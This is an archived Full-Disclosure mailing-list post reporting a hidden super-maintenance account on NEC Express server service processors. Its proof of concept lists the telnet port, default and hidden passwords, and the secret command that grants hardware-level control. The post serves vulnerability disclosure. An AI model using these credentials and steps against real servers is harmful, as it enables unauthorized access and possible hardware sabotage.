[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] hidden privilege user in supercomputer NEC Express 58000/1000 series
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] hidden privilege user in supercomputer NEC Express 58000/1000 series
- From: Djamshut Saarash <saarash@xxxxxxxxx>
- Date: Sat, 12 May 2012 10:33:56 +0000 (UTC)
<html><head></head><body bgcolor="" style=""><p>H!</p>
<p>NEC Corp. has a product line of high perfomance servers
- http://www.nec.com.sg/index.php?q=products/enterprise-servers</p>
<p>In the documentations it is said that there is two user privilege levels:</p>
<p>1. Common user - who can monitor the system status</p>
<p>2. Admin user - for configuring system hardware</p>
<p>but there is another very high privilege user, who can manipulate memory and
produce hardware falure.</p>
<p> </p>
<p>POC</p>
<p>Connect to the service processor of the NEC Express server with the telnet
client on port 5001:</p>
<p> </p>
<p>Integrated Service Processor.</p>
<p>Cabinet-ID:xx, Location:y, State:ssssss</p>
<p>iSP login: spfw<ENTER></p>
<p>iSP password: nec<ENTER></p>
<p>Copyright (C) 2005 NEC Corporation, All Rights Reserved.</p>
<p>Welcome to Integrated Service Processor.</p>
<p>iSP FW version : 01.00 generated on 01/01/2005 19:20:33</p>
<p>iSP MAIN MENU</p>
<p> 0) OS(BIOS) serial console of partition#0 (INITIALIZING )</p>
<p> 1) OS(BIOS) serial console of partition#1 (RUNNING
)</p>
<p> V) Virtual System Operator Panel</p>
<p> S) iSP commands</p>
<p> E) Exit</p>
<p> DISCONNECTALL) disconnect all console connections</p>
<p>iSPyz> s<ENTER></p>
<p> </p>
<p>Go to maintanance mode with the command "cm", default password mainte</p>
<p>Now at the command mode enter (With the periods at the end):</p>
<p> </p>
<p>iSP0m:MNT> nec=topvendor.</p>
<p>??? : good-bye.</p>
<p>Command mode was changed to super-maintenance mode.</p>
<p>BE CAREFUL to use each command.</p>
<p>iSP0m:@@@> </p>
<p> </p>
<p>you now have super admin rights at the hardware level of the
supercomputer!</p>
<p> </p>
<p>Thats it.....</p></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/